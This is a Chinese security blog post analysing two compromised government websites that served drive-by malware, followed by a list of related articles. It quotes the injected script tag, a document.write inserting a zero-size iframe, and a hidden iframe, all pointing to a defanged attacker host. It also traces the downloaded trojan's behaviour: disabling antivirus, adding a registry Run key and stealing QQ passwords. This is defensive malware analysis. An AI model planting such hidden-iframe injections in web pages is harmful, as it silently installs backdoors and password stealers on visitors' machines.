两个会自动下载恶意程序文件的政府网站

简介: 两个会自动下载恶意程序文件的政府网站

打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。

第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:

--------
<TR><script language=javascript src=bbs.js></script>
<TD vAlign=top align=right width="48%">
--------

bbs.js的内容为:

--------
document.write("<iframe src=hxxp://wzxqy.chao***kuai.com/***1***23/index.htm width=0 height=0></iframe>")
--------

hxxp://wzxqy.chao***kuai.com/***1***23/index.htm 的内容为JavaScript脚本,由于其中包含了攻击者所属组织和QQ号,所里不公开具体内容。

该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://wzxqy.chao***kuai.com/***1***23/123.exe, 保存为 IE临时文件夹中的 winlogin.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。(这与  小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫  中第二段脚本程序相似)

123.exe 下载两个文件:

hxxp://wzxqy***01.vip***6.25idc.cn/1***/888.exe (Kaspersky 报为 Backdoor.Win32.Hupigon.byq)

hxxp://wzxqy***01.vip***6.25idc.cn/1***/777.exe (Kaspersky 报为 Trojan-PSW.Win32.QQRob.hf)

777.exe 会:

1、终止瑞星实时监控中心,强行关闭瑞星杀毒软件窗口,删除瑞星在注册表中的开机启动项,如RavTask

2、把自己复制为%windir%/system32/NTdHcP.exe,并运行

3、修改注册表,在 [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下创建键"NTdhcp",其值为:"C:/WINDOWS/System32/NTdhcp.exe"

(endurer注:c:/windows是Windows系统文件夹路径,在不同的电脑中可能不同)

4、终止QQ进程,盗取QQ密码

第二个网站 hxxp://www.hj***.gov.cn的首页末被直接加入代码:

--------
<iframe src="hxxp://wzxqy.chao***kuai.Qcom/***1***23/index.htm" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
--------

经分析发现两个网站在同一个服务器上,因此被加入同一恶意代码也就不足为奇了。


相关文章
两个下载恶意程序文件的政府网站换花样了
两个下载恶意程序文件的政府网站换花样了
|
3月前
|
JavaScript 前端开发
又一个下载恶意文件的政府网站
又一个下载恶意文件的政府网站
|
3月前
|
数据安全/隐私保护 Windows
一个被加入自动下载灰鸽子的代码的网站
一个被加入自动下载灰鸽子的代码的网站
|
6月前
|
安全 Windows
【红队APT】钓鱼篇&Office-CVE&RLO隐藏&压缩包释放&免杀打包捆绑
【红队APT】钓鱼篇&Office-CVE&RLO隐藏&压缩包释放&免杀打包捆绑
|
开发框架 安全 前端开发
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
396 0
|
安全 Windows
恶意 Notepad++ 安装程序会推送 StrongPity 恶意软件
恶意 Notepad++ 安装程序会推送 StrongPity 恶意软件
|
监控 安全 网络安全
2022-渗透测试-制作恶意deb软件包来触发后门
2022-渗透测试-制作恶意deb软件包来触发后门
2022-渗透测试-制作恶意deb软件包来触发后门
|
Web App开发 安全
卡巴斯基提醒网民注意:压缩文件也能变木马
普通计算机用户一般都通过所下载文件的图标来判断文件类型,但这一方法并非绝对安全。很多病毒会修改自身的显示图标,伪装成正常文件,诱使用户点击运行。卡巴斯基实验室近期就检测到一种名为“首页修改大师”的木马(Trojan-Dropper.Win32.StartPage.cr),这种木马采用WINRAR压缩工具的图标迷惑用户,其实本身是一个exe可执行文件,一旦计算机用户不小心运行了该文件,系统就会被感染。
1126 0
|
安全 Windows
7-Zip 曝出零日安全漏洞!通过“模仿文件扩展名”向攻击者提供管理员权限
7-Zip 曝出零日安全漏洞!通过“模仿文件扩展名”向攻击者提供管理员权限
197 0
7-Zip 曝出零日安全漏洞!通过“模仿文件扩展名”向攻击者提供管理员权限
|
Web App开发 安全 数据安全/隐私保护
McAfee:黑客借"极光漏洞"获取企业源代码
在周三的RSA 2010大会发言中,McAfee的研究人员表示,以获取企业源代码为目的的网络犯罪正在盛行,而企业对此方面的保护略显不足。 在RSA 2010上,McAfee展示了一个分析报告,关于对Perforce公司(一个做住房产权软件的公司)的调查。
887 0

热门文章

最新文章